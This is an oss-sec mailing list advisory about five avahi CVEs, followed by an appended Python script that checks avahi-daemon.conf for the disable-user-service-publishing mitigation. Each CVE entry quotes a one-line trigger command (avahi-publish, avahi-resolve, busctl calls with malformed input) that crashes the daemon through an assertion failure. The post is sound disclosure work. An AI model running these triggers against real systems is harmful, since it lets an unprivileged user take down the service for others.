oss-sec mailing list archives

CVEs assigned for reachable assertions in avahi


From: Alan Coopersmith <alan.coopersmith () oracle com>
Date: Fri, 6 Oct 2023 14:19:17 -0700

While the CVE database still shows them as reserved, Red Hat's & Debian's
trackers show several CVEs being assigned for client requests that can
cause the Avahi server to abort with an assertion failure.  Only one of
them has a fix available so far.

----------------------------------------------------------------------------

CVE-2023-38469: https://github.com/lathiat/avahi/issues/455
 Reachable assertion in avahi_dns_packet_append_record

"It can be triggered by unprivileged local users
 (unless disable-user-service-publishing is set to yes explicitly):

 avahi-publish -s T _qotd._tcp 22 $(perl -le 'print "A " x 100000')"

----------------------------------------------------------------------------

CVE-2023-38470: https://github.com/lathiat/avahi/issues/454
 Reachable assertion in avahi_escape_label

"avahi-resolve -n 
',.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}'"

Fix: https://github.com/lathiat/avahi/commit/94cb6489114636940ac683515417990b55b5d66c

----------------------------------------------------------------------------

CVE-2023-38471: https://github.com/lathiat/avahi/issues/453
 Reachable assertion in dbus_set_host_name

"It can be triggered by unprivileged local users unless 1c599d8 is backported.

 busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server2 SetHostName "s" 'A\.B'"

----------------------------------------------------------------------------

CVE-2023-38472: https://github.com/lathiat/avahi/issues/452
 Reachable assertion in avahi_rdata_parse

"It can be reproduced by calling something like

  org.freedesktop.Avahi /Client*/EntryGroup* org.freedesktop.Avahi.EntryGroup AddRecord "iiusqquay" 0 0 0 '' 0 0 0 0

 using

  avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Test", 0x01, 0x10, 120, "", 0)

 from inside a client creating EntryGroups. It can be triggered by unprivileged
 users unless disable-user-service-publishing is set to yes explicitly.
 By default it's set to no."

----------------------------------------------------------------------------

CVE-2023-38473: https://github.com/lathiat/avahi/issues/451
 Reachable assertion in avahi_alternative_host_name

"busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server GetAlternativeHostName "s" ').'"

--
        -Alan Coopersmith-                 alan.coopersmith () oracle com
         Oracle Solaris Engineering - https://blogs.oracle.com/solaris
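Two of the issues above (CVE-2023-38469 and CVE-2023-38472) are reported as reachable by unprivileged local users unless `disable-user-service-publishing` is explicitly set to `yes`, and the default is `no`. The following is an added example, not part of this post or of the avahi project, that audits an avahi-daemon.conf for that setting. It assumes the usual INI layout with the key in the `[server]` section and the standard path `/etc/avahi/avahi-daemon.conf`; the boolean parsing (a value starting with `y`/`Y` counts as yes) is this script's own reading of how avahi-daemon treats the value, stated here as an assumption. The sample configurations embedded below are constructed for the demonstration.

```python
"""Audit avahi-daemon.conf for the disable-user-service-publishing mitigation.

Added example (not from the oss-sec post or the avahi project). It reports
whether unprivileged-user service publishing is disabled, the setting the
post names as blocking the CVE-2023-38469 / CVE-2023-38472 triggers.
"""
import configparser
import sys
from pathlib import Path

# Assumed standard location of the daemon configuration.
DEFAULT_CONF = Path("/etc/avahi/avahi-daemon.conf")

# Constructed sample: a stock-looking config with the key left commented out,
# which means the daemon falls back to the default of "no".
SAMPLE_DEFAULT = """\
[server]
#host-name=foo
use-ipv4=yes
use-ipv6=yes
#disable-user-service-publishing=no

[publish]
publish-hinfo=no
"""

# Constructed sample: the same config with the mitigation set explicitly.
SAMPLE_HARDENED = """\
[server]
use-ipv4=yes
use-ipv6=yes
disable-user-service-publishing=yes

[publish]
publish-hinfo=no
"""


def _is_yes(value: str) -> bool:
    # Assumption: avahi-daemon treats a value beginning with y/Y as "yes".
    return value.strip()[:1].lower() == "y"


def user_publishing_disabled(conf_text: str) -> bool:
    """Return True only if [server] disable-user-service-publishing is yes.

    A missing section or key means the daemon default ("no") applies, so
    the mitigation is reported as absent.
    """
    parser = configparser.ConfigParser(interpolation=None, allow_no_value=True)
    parser.read_string(conf_text)
    if not parser.has_section("server"):
        return False
    value = parser.get("server", "disable-user-service-publishing", fallback="")
    return _is_yes(value or "")


def audit(conf_text: str) -> dict:
    """Summarise the finding for a config body, with the CVEs the post ties to it."""
    disabled = user_publishing_disabled(conf_text)
    return {
        "disable-user-service-publishing": "yes" if disabled else "no (default or unset)",
        "mitigated": ["CVE-2023-38469", "CVE-2023-38472"] if disabled else [],
        "action": None if disabled
        else "set disable-user-service-publishing=yes under [server] and restart avahi-daemon",
    }


def audit_file(path: Path = DEFAULT_CONF) -> dict:
    """Audit a config file on disk; missing file is reported as the default."""
    if not path.exists():
        return audit("")
    return audit(path.read_text())


if __name__ == "__main__":
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else DEFAULT_CONF
    for key, val in audit_file(target).items():
        print(f"{key}: {val}")
```

Run it with no argument to audit the default path, or pass another file. Note that the post ties this setting only to the two CVEs above; CVE-2023-38471 is said to need commit 1c599d8 backported, and CVE-2023-38470 has its own fix commit, so a clean result here is not a statement about the whole set.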
